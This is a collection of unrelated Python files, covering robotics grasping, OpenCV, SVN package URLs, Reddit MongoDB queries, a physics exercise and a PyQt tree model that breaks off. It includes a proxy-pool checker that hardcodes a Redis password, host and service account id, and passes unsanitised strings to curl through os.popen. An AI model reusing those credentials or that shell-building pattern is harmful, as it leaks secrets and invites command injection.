pnp = GpdPickPlace(mark_pose=True)
pnp.planning.clear()
# Get the pointcloud from camera, filter it, extract indices and publish it to gpd CNN
#gpd_prep = GpdGrasps(max_messages=8)
#gpd_prep.filter_cloud()
#gpd_prep.publish_indexed_cloud()
call_pointcloud_filter_service()
pnp.wait_for_mesh_and_save()
# Wait for grasps from gpd, wrap them into Grasp msg format and start picking
selected_grasps = pnp.get_gpd_grasps()
formatted_grasps = pnp.generate_grasp_msgs(selected_grasps)
n.open_gripper(TOOL_GRIPPER_3_ID, 200)
print("Gripper 2 opened")
successful_grasp = pnp.pick(formatted_grasps, verbose=False)
n.close_gripper(TOOL_GRIPPER_3_ID, 200)
print("Gripper 2 closed")
# Place object with successful grasp pose as the starting point
pnp.place2(successful_grasp, n)
#n.open_gripper(TOOL_GRIPPER_3_ID, 200)
#print("Gripper 2 opened")
#pnp.return_to_rest(successful_grasp)
#n.close_gripper(TOOL_GRIPPER_3_ID, 200)
#print("Gripper 2 closed")
# pnp.place(successful_grasp)
# fix_grasp = pnp.get_know_successful_grasp()
# pnp.place(fix_grasp)
pinfo("Demo runtime: " + str(datetime.datetime.now() - start_time))
#static_transform_nodes = [node_name for node_name in get_node_names() if node_name[:27] == '/static_transform_publisher']
#kill_nodes(static_transform_nodes)
|
import cv2 as cv
import numpy as np
src = cv.imread("E:\\gannimei\\PycharmProjects\\opencv_python\\images\\github.jpg")
cv.namedWindow("input", cv.WINDOW_AUTOSIZE)
cv.imshow("input", src)
print(type(src))
print(src.shape)
# 克隆图像
m1 = np.copy(src)
# 赋值
m2 = src
src[0:100, 0:100, :] = 255
cv.imshow("m2", m2)
m3 = np.zeros(src.shape, src.dtype)
cv.imshow("m3", m3)
m4 = np.zeros([512, 512], np.uint8)
cv.imshow("m4", m4)
m5 = np.zeros(shape=[512, 512, 3], dtype=np.uint8)
m5[:, :, 0] = 255
cv.imshow("m5", m5)
print(m5.shape)
cv.waitKey(0)
cv.destroyAllWindows()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import redis
import urllib2
import time
import os
# 1、每天获取总的ip数(过滤24小时内提取过的),端口设定80 8080 8118 8123 808等
# 目前最大数量450左右
# 2、间隔十分钟左右检查所有ip是否有效,检查6次,查看6次全通的占比,5次全通的占比,以次所有占比情况
# 3、第二天再次操作步骤2,检查ip第二天的有效情况
# 4、第二天再操作步骤1和2
# 问题:当请求数变多时,会出现请求失败的问题
# =>request ip number: 1
# --> len(ips): 454
# Traceback (most recent call last):
# File "get_ip_pool.py", line 114, in <module>
# if redis.getScard("ipPool")>=1000:
# File "get_ip_pool.py", line 38, in main
# with open(ip_file) as f:
# File "get_ip_pool.py", line 22, in get_all_ip
# req = urllib2.Request(url)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 154, in urlopen
# return opener.open(url, data, timeout)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 435, in open
# response = meth(req, response)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 548, in http_response
# 'http', request, response, code, msg, hdrs)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 473, in error
# return self._call_chain(*args)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 407, in _call_chain
# result = func(*args)
# File "C:\Users\tpf\AppData\Local\Continuum\Anaconda2\lib\urllib2.py", line 556, in http_error_default
# raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
# urllib2.HTTPError: HTTP Error 503: Service Temporarily Unavailable
def get_all_ip(max_num=100):
"""
至少获取1000个ip以上才停止
"""
ips = set([])
try:
while True:
url = "http://ttvp.daxiangip.com/ip/?tid=559436287116377&delay=1&category=2&foreign=none&ports=8123,8118,80,8080,808&filter=on&num=30"
#url = "http://ttvp.daxiangip.com/ip/?tid=559436287116377&delay=1&category=2&foreign=none&ports=8123,8118,80,8080,808&num=30"
req = urllib2.Request(url)
res_data = urllib2.urlopen(req)
ip_ports = res_data.read().split("\r\n")
print '=>request ip number:', len(ip_ports)
for ip_port in ip_ports:
ips.add(ip_port)
print '--> len(ips):', len(ips)
if len(ips) > max_num:
break
time.sleep(2)
except:
with open('get_all_ip.txt', 'w') as f:
for one in ips:
print >> f, one
with open('get_all_ip.txt', 'w') as f:
for one in ips:
print >> f, one
def check_ip_valid(ip_file='get_all_ip.txt', retry_num=6, retry_interval=10*60, test_web="https://cn.china.cn"):
ip_ports = set([])
with open(ip_file) as f:
for line in f:
ip_ports.add(line.strip())
print "len(ip_ports):", len(ip_ports)
ip_pass_cnt = {}
cnt_retry_num = 0
while cnt_retry_num < retry_num:
for ip_port in ip_ports:
s = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x " + ip_port + " " + test_web
print s
try:
ret_code = os.popen(s).read()
print ret_code
except:
#print s
print 'exception occur'
continue
time.sleep(.5)
if ret_code != '200':
continue
if ip_pass_cnt.__contains__(ip_port):
ip_pass_cnt[ip_port] += 1
else:
ip_pass_cnt[ip_port] = 1
cnt_retry_num += 1
if cnt_retry_num < retry_num:
time.sleep(retry_interval)
with open('check_ip_valid.txt', 'w') as f:
# 统计出现不同次数的个数
pass_cnt_dict = {}
for k, v in ip_pass_cnt.items():
print >> f, "%s\t%d" % (k, v)
if pass_cnt_dict.__contains__(v):
pass_cnt_dict[v] += 1
else:
pass_cnt_dict[v] = 1
print >> f, '\t\t\t----------------------频次统计'
for k, v in pass_cnt_dict.items():
print >> f, "\t\t\t%s\t%d" % (k, v)
def check_ip_valid_next(pre_file=None, ip_file='get_all_ip.txt', retry_num=6, retry_interval=10*60, test_web="https://cn.china.cn"):
ip_ports = set([])
with open(ip_file) as f:
for line in f:
ip_ports.add(line.strip())
print "len(ip_ports):", len(ip_ports)
#init ip_pass_cnt
ip_pass_cnt = {}
for ip_port in ip_ports:
ip_pass_cnt[ip_port] = 0
with open(pre_file) as f:
for line in f:
elems = line.rstrip('\n').split('\t')
if len(elems) != 2:
continue
ip_pass_cnt[elems[0]] = int(elems[1])
print "len(ip_pass_cnt):", len(ip_pass_cnt)
#print 'ip_pass_cnt', ip_pass_cnt
cnt_retry_num = 0
while cnt_retry_num < retry_num:
for ip_port in ip_ports:
s = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x " + ip_port + " " + test_web
print s
try:
ret_code = os.popen(s).read()
print ret_code
except:
#print s
print 'exception occur'
continue
time.sleep(.1)
if ret_code != '200':
continue
if ip_pass_cnt.__contains__(ip_port):
ip_pass_cnt[ip_port] += 1
else:
ip_pass_cnt[ip_port] = 1
cnt_retry_num += 1
if cnt_retry_num < retry_num:
time.sleep(retry_interval)
with open('check_ip_valid.txt', 'w') as f:
# 统计出现不同次数的个数
pass_cnt_dict = {}
for k, v in ip_pass_cnt.items():
print >> f, "%s\t%d" % (k, v)
if pass_cnt_dict.__contains__(v):
pass_cnt_dict[v] += 1
else:
pass_cnt_dict[v] = 1
print >> f, '\t\t\t----------------------频次统计'
for k, v in pass_cnt_dict.items():
print >> f, "\t\t\t%s\t%d" % (k, v)
def main():
#get_all_ip()
#check_ip_valid(retry_interval=10*60)
check_ip_valid_next(pre_file='check_ip_valid20170410_12-14.txt', retry_interval=10*60)
def getIp(num):
output = set([])
cnt = 0
for _i in range(5):
url = "http://ttvp.daxiangip.com/ip/?tid=559436287116377&delay=1&category=2&foreign=none&ports=8123,8118,80,8080&filter=on&num=10"
req = urllib2.Request(url)
res_data = urllib2.urlopen(req)
res = res_data.read().split("\r\n")
print len(res),"------->",_i
for ip_port in res:
test = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x "+ip_port+" https://cn.china.cn"
print test
ret_code = os.popen(test).read()
print ret_code,"----"
if ret_code != '200':
continue
output.add(ip_port)
cnt += 1
time.sleep(2)
# once again
for ip_port in res:
test = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x "+ip_port+" https://cn.china.cn"
print test
ret_code = os.popen(test).read()
print ret_code,"----"
if ret_code != '200' and ip_port in output:
output.remove(ip_port)
cnt -= 1
if cnt >= num:
break
return output
def update_ip():
try:
redis=RedisConnect("192.168.200.116",6379,4,"mypasshahayou")
count=redis.getScard("ipPool")
if not count:
Ips=getIp(10000)
for i in Ips:
print "------Is insert ip :%s---------"%i
redis.setSadd("ipPool",i)
if redis.getScard("ipPool")>=1000:
break
else:
ipList=redis.getSrandmember("ipPool",80)
for i in ipList:
test = "curl --connect-timeout 3 -o /dev/null -s -w %{http_code} -x "+i+" http://www.hc360.com/"
print test
output = os.popen(test)
num = output.read()
print num,"----"
if int(num) != 200 :
print "xxxxxxxxxxIs delete ip :%sxxxxxxxxxxx"%i
redis.srem("ipPool",i)
Ipss=getIp(10000)
m=0
while m < len(Ipss) :
print redis.getScard("ipPool")
print "------Is update ip :%s---------"%Ipss[m]
redis.setSadd("ipPool",Ipss[m])
m+=1
print "--------------------------Update Ip Success----------------------------"
print "---------------------------Wait for the update, the next update will be in 60 seconds after the----------------------------------------------"
except Exception,e:
redis=RedisConnect("192.168.200.116",6379,4,"mypasshahayou")
count=redis.getScard("ipPool")
print e
#Delete some ip
if __name__ == "__main__":
main()
#ret = getIp(20)
#print ret |
""" Handles repository layout scheme and package URLs."""
import os
import urlparse
from RepSys import Error, config
from RepSys.svn import SVN
__all__ = ["package_url", "checkout_url", "repository_url", "get_url_revision"]
def layout_dirs():
devel_branch = config.get("global", "trunk-dir", "cooker/")
devel_branch = os.path.normpath(devel_branch)
branches_dir = config.get("global", "branches-dir", "updates/")
branches_dir = os.path.normpath(branches_dir)
return devel_branch, branches_dir
def get_url_revision(url, retrieve=True):
"""Get the revision from a given URL
If the URL contains an explicit revision number (URL@REV), just use it
without even checking if the revision really exists.
The parameter retrieve defines whether it must ask the SVN server for
the revision number or not when it is not found in the URL.
"""
url, rev = split_url_revision(url)
if rev is None and retrieve:
# if no revspec was found, ask the server
svn = SVN()
rev = svn.revision(url)
return rev
def unsplit_url_revision(url, rev):
if rev is None:
newurl = url
else:
parsed = list(urlparse.urlparse(url))
path = os.path.normpath(parsed[2])
parsed[2] = path + "@" + str(rev)
newurl = urlparse.urlunparse(parsed)
return newurl
def split_url_revision(url):
"""Returns a tuple (url, rev) from an subversion URL with @REV
If the revision is not present in the URL, rev is None.
"""
parsed = list(urlparse.urlparse(url))
path = os.path.normpath(parsed[2])
dirs = path.rsplit("/", 1)
lastname = dirs[-1]
newname = lastname
index = lastname.rfind("@")
rev = None
if index != -1:
newname = lastname[:index]
rawrev = lastname[index+1:]
if rawrev:
try:
rev = int(rawrev)
if rev < 0:
raise ValueError
except ValueError:
raise Error, "invalid revision specification on URL: %s" % url
dirs[-1] = newname
newpath = "/".join(dirs)
parsed[2] = newpath
newurl = urlparse.urlunparse(parsed)
return newurl, rev
def checkout_url(pkgdirurl, branch=None, version=None, release=None,
releases=False, pristine=False, append_path=None):
"""Get the URL of a branch of the package, defaults to current/
It tries to preserve revisions in the format @REV.
"""
parsed = list(urlparse.urlparse(pkgdirurl))
path, rev = split_url_revision(parsed[2])
if releases:
path = os.path.normpath(path + "/releases")
elif version:
assert release is not None
path = os.path.normpath(path + "/releases/" + version + "/" + release)
elif pristine:
path = os.path.join(path, "pristine")
elif branch:
path = os.path.join(path, "branches", branch)
else:
path = os.path.join(path, "current")
if append_path:
path = os.path.join(path, append_path)
path = unsplit_url_revision(path, rev)
parsed[2] = path
newurl = urlparse.urlunparse(parsed)
return newurl
def convert_default_parent(url):
"""Removes the cooker/ component from the URL"""
parsed = list(urlparse.urlparse(url))
path = os.path.normpath(parsed[2])
rest, last = os.path.split(path)
parsed[2] = rest
newurl = urlparse.urlunparse(parsed)
return newurl
def remove_current(pkgdirurl):
parsed = list(urlparse.urlparse(pkgdirurl))
path = os.path.normpath(parsed[2])
rest, last = os.path.split(path)
if last == "current":
# FIXME this way we will not allow packages to be named "current"
path = rest
parsed[2] = path
newurl = urlparse.urlunparse(parsed)
return newurl
def repository_url(mirrored=False):
url = None
if mirrored and config.getbool("global", "use-mirror", "yes"):
url = config.get("global", "mirror")
if url is None:
url = config.get("global", "repository")
if not url:
# compatibility with the default_parent configuration option
default_parent = config.get("global", "default_parent")
if default_parent is None:
raise Error, "you need to set the 'repository' " \
"configuration option on repsys.conf"
url = convert_default_parent(default_parent)
return url
def package_url(name_or_url, version=None, release=None, distro=None,
mirrored=True):
"""Returns a tuple with the absolute package URL and its name
@name_or_url: name, relative path, or URL of the package. In case it is
a URL, the URL will just be 'normalized'.
@version: the version to be fetched from releases/ (requires release)
@release: the release number to be fetched from releases/$version/
@distro: the name of the repository branch inside updates/
@mirrored: return an URL based on the mirror repository, if enabled
"""
from RepSys import mirror
if "://" in name_or_url:
pkgdirurl = mirror.normalize_path(name_or_url)
pkgdirurl = remove_current(pkgdirurl)
if mirror.using_on(pkgdirurl) and not mirrored:
pkgdirurl = mirror.relocate_path(mirror.mirror_url(),
repository_url(), pkgdirurl)
else:
name = name_or_url
devel_branch, branches_dir = layout_dirs()
if distro or "/" in name:
default_branch = branches_dir
if distro:
default_branch = os.path.join(default_branch, distro)
else:
default_branch = devel_branch # cooker
path = os.path.join(default_branch, name)
parsed = list(urlparse.urlparse(repository_url(mirrored=mirrored)))
parsed[2] = os.path.join(parsed[2], path)
pkgdirurl = urlparse.urlunparse(parsed)
return pkgdirurl
def package_name(pkgdirurl):
"""Returns the package name from a package URL
It takes care of revision numbers"""
parsed = urlparse.urlparse(pkgdirurl)
path, rev = split_url_revision(parsed[2])
rest, name = os.path.split(path)
return name
def package_spec_url(pkgdirurl, *args, **kwargs):
"""Returns the URL of the specfile of a given package URL
The parameters are the same used by checkout_url, except append_path.
"""
kwargs["append_path"] = "SPECS/" + package_name(pkgdirurl) + ".spec"
specurl = checkout_url(pkgdirurl, *args, **kwargs)
return specurl
def distro_branch(pkgdirurl):
"""Tries to guess the distro branch name from a package URL"""
from RepSys.mirror import same_base
found = None
repo = repository_url()
if same_base(repo, pkgdirurl):
devel_branch, branches_dir = layout_dirs()
repo_path = urlparse.urlparse(repo)[2]
devel_path = os.path.join(repo_path, devel_branch)
branches_path = os.path.join(repo_path, branches_dir)
parsed = urlparse.urlparse(pkgdirurl)
path = os.path.normpath(parsed[2])
if path.startswith(devel_path):
# devel_branch must be before branches_dir in order to allow
# devel_branch to be inside branches_dir, as in /branches/cooker
_, found = os.path.split(devel_branch)
elif path.startswith(branches_path):
comps = path.split("/")
if branches_path == "/":
found = comps[1]
elif len(comps) >= 2: # must be at least branch/pkgname
found = comps[branches_path.count("/")+1]
return found
|
from keys import *
import webbrowser
import pyautogui
import requests
import argparse
import tweepy
import time
def fetch_urls_from_tweet(api, status_id):
status = api.get_status(status_id, tweet_mode="extended")
try:
content = status.retweeted_status.full_text
except AttributeError:
content = status.full_text
urls = [i for i in content.split() if i.lower().startswith(("https://", "buff.ly", "t.co", "bit.ly"))]
return urls
def request_url(short_url):
try:
extended = requests.get(short_url, timeout=5)
return extended.url
except Exception as e:
print(e)
def get_extended_url(api, tweet_list):
all_urls = list()
all_urls.extend(fetch_urls_from_tweet(api=api, status_id=i) for i in tweet_list)
all_urls = [item for sublist in all_urls for item in sublist]
extended_urls = [request_url(i) for i in all_urls]
save_list(inlist=extended_urls)
return extended_urls
def save_list(inlist):
url_list = [i for i in inlist if i is not None]
with open('all_urls.txt', 'w') as fh:
for item in url_list:
fh.write("%s\n" % item)
def save_to_zotero(url):
webbrowser.open(url)
time.sleep(5)
pyautogui.hotkey('ctrl', 'shift', 's')
time.sleep(10)
def run(tweet_ids):
auth = tweepy.OAuthHandler(api_key, api_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
extended_urls = get_extended_url(api=api, tweet_list=tweet_ids)
for url in extended_urls:
try:
save_to_zotero(url=url)
except Exception as e:
print(e)
parser = argparse.ArgumentParser(description='Save Twitter Bookmarked Papers to Zotero')
parser.add_argument('-i','--input', help='Provide input', required=True)
args = parser.parse_args()
if args.input:
try:
with open(args.input, "r") as handle:
tweet_ids=[i.split(',')[0].split('/')[-1] for i in handle.readlines()[1:]]
run(tweet_ids=tweet_ids)
except Exception as e:
print(e)
else:
print('Provide an input file') |
"""
zbx.exceptions
~~~~~~~~~~~~~~
"""
class ValidationError(ValueError):
pass
class RPCException(Exception):
def __init__(self, message, code, data=None):
message = '%s(%d): %s' % (message, code, data)
super(RPCException, self).__init__(message)
self.code = code
self.data = data
|
'''Utils.
Author:
P. Polakovic
'''
def ffs(num):
'''Returns first signed bit.'''
if num == 0:
return None
i = 0
while num % 2 == 0:
i += 1
num = num >> 1
return i
def qalign(num):
'''Aligns `n` on 8 bytes boundary.'''
return (num & ~0x7) + 0x8 if num % 0x08 else num |
import pymongo
from bson.json_util import dumps
import json
def get_top_10_by_points(event, context):
working_collection = get_working_collection()
found_subreddits = get_find_subreddits(event, working_collection)
result = found_subreddits.sort("punctuation", pymongo.DESCENDING).limit(10)
return cursor_to_json(result)
def get_top_10_by_num_comments(event, context):
working_collection = get_working_collection()
found_subreddits = get_find_subreddits(event, working_collection)
result = found_subreddits.sort("num_comments", pymongo.DESCENDING).limit(10)
return cursor_to_json(result)
def get_top_10_submitters(event, context):
working_collection = get_working_collection()
pipe = [{"$group":
{"_id": {"author": "$author"},
"count": {"$sum": 1}}},
{"$sort": {"count": -1}},
{"$limit": 10}]
found_subreddits = working_collection.aggregate(pipeline=pipe)
return cursor_to_json(found_subreddits)
def get_top_10_commenters(event, context):
working_collection = get_working_collection()
pipe = [{"$unwind": "$comments"},
{"$group":
{"_id": "$comments.author",
"count": {"$sum": 1}}},
{"$sort": {"count": -1}},
{"$limit": 10}]
found_subreddits = working_collection.aggregate(pipeline=pipe)
return cursor_to_json(found_subreddits)
def get_all_posts_by_user(event, context):
author = get_query_author(event)
if author is None:
return {}
working_collection = get_working_collection()
result = working_collection.find({'author': author})
return cursor_to_json(result)
def get_all_posts_by_user_comments(event, context):
author = get_query_author(event)
if author is None:
return {}
working_collection = get_working_collection()
result = working_collection.find({"comments": {"$elemMatch": {"author": author}}})
return cursor_to_json(result)
def get_average_comment_karma_by_user(event, context):
author = get_query_author(event)
if author is None:
return {}
working_collection = get_working_collection()
pipe = [{"$unwind": "$comments"},
{"$group":
{"_id": "$comments.author",
"count": {"$sum": 1},
"avgPunctuation": {"$avg": "$comments.punctuation"}
}},
{"$match": {"_id": author}}]
average_comment_karma = working_collection.aggregate(pipeline=pipe)
return cursor_to_json(average_comment_karma)
def get_query_author(event):
author = None
if event['query']:
if event['query']['author']:
author = event['query']['author']
return author
def get_find_subreddits(event, working_collection):
if event['query']:
if event['query']['rank']:
if event['query']['rank'] == "all":
result = working_collection.find()
elif event['query']['rank'] == "discussion":
result = working_collection.find({'external_article': False})
elif event['query']['rank'] == "external":
result = working_collection.find({'external_article': True})
else:
result = working_collection.find()
return result
result = working_collection.find()
return result
def cursor_to_json(cursor):
json_string = dumps(cursor)
json_string = json.loads(json_string)
return json_string
def get_working_collection():
with open('mongo_db.json') as data_file:
data_item = json.load(data_file)
client = pymongo.MongoClient(data_item["mongo_url"])
test_database = client.get_database(data_item["mongo_database"])
working_collection = test_database.get_collection(data_item["mongo_collection"])
return working_collection
|
"""
Innlevering 1 | Oppgave 5
Kjør programmet ved kommandoen:
python oppg_5.py
Kastet er vertikalt, dvs at ballen kun vil bevege seg langs vertikalaksen(y-aksen).
Setter positiv retning oppover.
Ser bort fra luftmotstand, da er den eneste kraften som virker på ballen i luften vekten, W = mg.
Summen av kreftene er ikke lik 0, så -W = ma <=> -mg = ma <=> a = -g, hvor g = 9.81 m/s^2.
Ut fra bevegelseslikningene, så får vi at
y = y0 + v0*t + 1/2*a*t^2, hvor vi setter nullpunktet i utgangshøyden, altså er y0 = 0, og substituerer -g inn for a. Dette gir
y = v0*t - 1/2*g*t^2
For å finne tiden ballen bruker fra den blir kastet til den lander igjen, så kan vi finne løsningene
for y = 0.
Vi ser at
v0*t = 1/2*g*t^2
som gir løsningene
- t = 0
- t = 2v0/g
Vi er ute etter den siste løsningen, når ballen treffer bakken etter å ha vært i luften.
Vi vet at apex-punktet(det høyeste punktet) på kurven til et kast når vi ser bort fra luftmotstand
er høyden ved t_slutt/2.
"""
import numpy as np
import matplotlib.pylab as plt
g = 9.81
def calculate_time_of_impact(v0, a=-g, y0 = 0):
"""
For a vertical toss, given the initial velocity v0 and the acceleration, a,
calculate at which time the ball hits the ground after being airborne.
Note that positive direction is upwards.
v0 - initial velocity given in meter(s) per second.
y0 - initial height given in meter(s).
a - acceleration given in meter(s) per second per second.
Returns the latest time at which the position is 0 meters in second(s), aka
the time of impact after being airborne.
"""
t_1 = (-v0 + (v0**2-2*a*y0)**0.5)/a
t_2 = (-v0 - (v0**2-2*a*y0)**0.5)/a
return t_1 if t_1 == t_2 else max(t_1, t_2)
def calculate_height(v0, t, a=-g, y0 = 0):
"""
For a vertical toss, given the initial velocity v0, initial height y0
and the acceleration, a, of the object, calculate the height at time t.
Note that positive direction is upwards.
v0 - initial velocity given in meter(s) per second.
y0 - initial height given in meter(s).
a - acceleration given in meter(s) per second per second.
t - time given in second(s).
Returns the height at time t in meter(s).
"""
return y0 + v0*t + 1/2*a*t**2
def calculate_max_height(v0_y, a_y=-g, y0 = 0):
"""
Calculates the max-height of a given the initial vertical velocity v0_y, the vertical acceleration, a_y
and the initial height, y0 by recognizing that when disregarding air-resistance, the time of the apex of the jump
is half the time of the impact, or halfway between the time of toss and the time of impact.
v0_y - initial vertical velocity given in meter(s) per second.
a_y - initial vertical acceleration given in meter(s) per second per second.
y0 - initial height given in meter(s).
"""
t_apex = calculate_time_of_impact(v0_y, a_y, y0)/2
return calculate_height(v0_y, t_apex, a_y, y0)
def solve_a():
print("a)\n")
print(calculate_max_height(5))
def solve_b():
print("\nb)\n")
print(calculate_max_height(10))
def solve_c():
print("\nc)\n")
v0_start = 0
v0_slutt = 20
v0_steg = 0.1
v0_arr = np.arange(v0_start, v0_slutt, v0_steg)
# Utfordringen her er at du kan ikke bare gi v0_arr som et argument til
# 'calculate_max_height' fordi den ikke er av datatypen 'int'.
# Derfor må du bruke list-comprehension til å danne et nytt 'numpy.ndarray' fra
# max-høyden til hver enkelt verdi i v0-arr, ellers får du en 'ValueError'.
y_max = np.array([calculate_max_height(v0) for v0 in v0_arr])
ax = plt.subplot(111)
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
plt.scatter(v0_arr, y_max)
plt.xlabel("Initial velocity (m/s)", fontsize=16)
plt.ylabel("Max height (m)", fontsize=16)
plt.show()
if __name__ == "__main__":
solve_a()
solve_b()
solve_c()
|
#!/usr/bin/env python
import numpy as np
#!/usr/bin/env python
import sip
API_NAMES = ["QDate", "QDateTime", "QString", "QTextStream", "QTime", "QUrl", "QVariant"]
API_VERSION = 2
for name in API_NAMES:
sip.setapi(name, API_VERSION)
from PyQt4 import QtCore, QtGui, uic
# from source.dxf2shape import *
import itertools
class DoubleSpinBoxDelegate(QtGui.QItemDelegate):
def createEditor(self, parent, option, index):
editor = QtGui.QDoubleSpinBox(parent)
editor.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
spin_vars = index.model().getSpinVars(index)
if spin_vars != False:
spin_range = spin_vars[0]
spin_decimals = spin_vars[1]
spin_steps = spin_vars[2]
editor.setDecimals(spin_decimals)
editor.setRange(*spin_range)
editor.setSingleStep(spin_steps)
return editor
def setEditorData(self, spinBox, index):
value = index.model().data(index, QtCore.Qt.EditRole)
try:
spinBox.setValue(value)
except:
pass
spinBox.clear()
def setModelData(self, spinBox, model, index):
spinBox.interpretText()
value = spinBox.value()
model.setData(index, value, QtCore.Qt.EditRole)
def updateEditorGeometry(self, editor, option, index):
editor.setGeometry(option.rect)
class ColorDelegate(QtGui.QItemDelegate):
def createEditor(self, parent, option, index):
color_dialog = QtGui.QColorDialog(parent)
color_dialog.setCurrentColor(QtGui.QColor(255,255,255))
color_dialog.setOption(color_dialog.DontUseNativeDialog,True)
color_dialog.setOption(color_dialog.ShowAlphaChannel,True)
changed = color_dialog.exec_()
if changed:
color = list(color_dialog.currentColor().getRgb())[:-1]
index.model().setData(index, color, QtCore.Qt.EditRole)
class TreeItem(object):
def __init__(self, data, parent=None, model=None):
self.model = model
self.color = (255,255,255)
self.is_closed = False
self.parentItem = parent
self.itemData = data
self.childItems = []
self.dxfData = None
self.pltData = None
self.show = False
self.handle = None
self.entity = None
self.pltHandle = []
self.checkState = QtCore.Qt.Unchecked
self.fillAngle = 0
self.fillStep = 0.1
self.volt = 20.0
self.rate = 1.0
self.length = 0.0
self.sketchTime = 0.0
# shape.type = None # [VirtualElectrode, line, area]
def index(self):
index = self.model.createIndex(self.parentItem.childNumber(), 0, self.parentItem)
return index
def redraw(self):
if self.entity != None:
self.setDxfData(dxf2shape(self.entity, fill_step = self.fillStep, fill_angle=self.fillAngle))
def setColor(self,color):
self.color=color
def setCheckState(self, value):
if value == 2:
self.checkState = QtCore.Qt.Checked
elif value == 1:
self.checkState = QtCore.Qt.PartiallyChecked
else:
self.checkState = QtCore.Qt.Unchecked
return self.checkState
def setEntity(self, entity):
self.entity = entity
self.redraw()
def setDxfData(self, data):
self.dxfData = data
self.pltData = []
for k in self.dxfData:
self.pltData.append(k.reshape((-1,2)))
self.calcTime()
def calcLength(self):
try:
dat = np.concatenate(self.pltData).reshape((-1,2))
except:
# print 'error calculating length'
return
dat_b = np.roll(dat,-2)
dist = 0
for k in range(len(dat)-1):
dist += np.linalg.norm(dat[k]-dat_b[k])
self.length = dist
def calcTime(self):
if self.childCount() == 0:
self.calcLength()
self.sketchTime = self.length / float(self.rate)
else:
self.sketchTime = 0.0
# self.setData(5,self.sketchTime)
for i in range(self.childCount()):
if self.child(i).checkState == 2:
self.sketchTime += self.child(i).sketchTime
self.setData(5,round(float(self.sketchTime),1))
def child(self, row):
return self.childItems[row]
def childCount(self):
return len(self.childItems)
def childNumber(self):
if self.parentItem != None:
return self.parentItem.childItems.index(self)
return 0
def columnCount(self):
return len(self.itemData)
def data(self, column=None):
self.calcTime()
if column == None:
return self.itemData[:]
return self.itemData[column]
def insertChildren(self, position, count, columns):
# print('insertChildren')
if position < 0 or position > len(self.childItems):
return False
for row in range(count):
data = [None for v in range(columns)]
item = TreeItem(data, self, self.model)
self.childItems.insert(position, item)
return True
def insertColumns(self, position, columns):
if position < 0 or position > len(self.itemData):
return False
for column in range(columns):
self.itemData.insert(position, None)
for child in self.childItems:
child.insertColumns(position, columns)
return True
def parent(self):
return self.parentItem
def removeChildren(self, position, count):
# print('removeChildren')
if position < 0 or position + count > len(self.childItems):
return False
for row in range(count):
self.childItems.pop(position)
return True
def removeColumns(self, position, columns):
if position < 0 or position + columns > len(self.itemData):
return False
for column in range(columns):
self.itemData.pop(position)
for child in self.childItems:
child.removeColumns(position, columns)
return True
def setData(self, column, value, index=None):
if column < 0 or column >= len(self.itemData):
return False
# print(self.model.rootData[column],column, value)
if self.model.rootData[column] == 'Angle':
value= float(value)
if self.fillAngle != value:
self.fillAngle = value
self.redraw()
elif self.model.rootData[column] == 'Rate':
value= float(value)
if self.rate != value:
self.rate = value
self.calcTime()
elif self.model.rootData[column] == 'Step':
value= float(value)
if self.fillStep != value:
self.fillStep = value
self.redraw()
elif self.model.rootData[column] == 'Closed':
value= bool(value)
if self.is_closed != value:
self.is_closed = value
self.redraw()
elif self.model.rootData[column] == 'Time':
value= float(value)
if self.sketchTime != value:
self.sketchTime = value
if self.parent() == None:
value = 'Time'
elif self.model.rootData[column] == 'Color':
self.color = value
self.itemData[column] = value
return True
class TreeModel(QtCore.QAbstractItemModel):
def __init__(self, headers, data, parent=None):
super(TreeModel, self).__init__(parent)
self.checks = {}
self.rootData = [header for header in headers] # Header Names
self.rootItem = TreeItem(self.rootData, model=self)
self.setupModelData(data, self.rootItem)
self._checked=[[False for i in range(self.columnCount())] for j in range(self.rowCount())]
def columnCount(self, parent=QtCore.QModelIndex()):
return self.rootItem.columnCount()
def getSpinVars(self,index):
column = index.column()
# range decimals steps
if self.rootData[column] == 'Angle':
return [(-3600,3600), 1, 1.0]
elif self.rootData[column] == 'Voltage':
return [(-210,210), 1, 0.1]
elif self.rootData[column] == 'Step':
return [(0.001,1000), 3, 0.01]
elif self.rootData[column] == 'Rate':
return [(0.01,1000), 2, 0.1]
else:
return False
def data(self, index, role):
if not index.isValid():
return None
if role == QtCore.Qt.CheckStateRole:
if index.column() == 0:
return self.checkState(index)
if index.column() == 6:
item = self.getItem(index)
try:
return item.entity.is_closed
except:
pass
item = self.getItem(index)
if (role == QtCore.Qt.BackgroundRole) & (self.rootData[index.column()] == 'Color'):
return QtGui.QColor(*item.color)
if role != QtCore.Qt.DisplayRole and role != QtCore.Qt.EditRole:
return None
return item.data(index.column())
def flags(self, index):
if not index.isValid():
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsDropEnabled
colname = self.rootData[index.column()]
if colname in ['Name', 'Time', 'Type']:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable |QtCore.Qt.ItemIsDropEnabled |QtCore.Qt.ItemIsDragEnabled
return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable |QtCore.Qt.ItemIsDropEnabled |QtCore.Qt.ItemIsDragEnabled
def supportedDropActions( self ):
'''Items can be moved and copied (but we only provide an interface for moving items in this example.'''
# print('supportedDropActions')
return QtCore.Qt.MoveAction # | QtCore.Qt.CopyAction
def getItem(self, index):
if index.isValid():
item = index.internalPointer()
if item:
return item
return self.rootItem
def checkState(self, index):
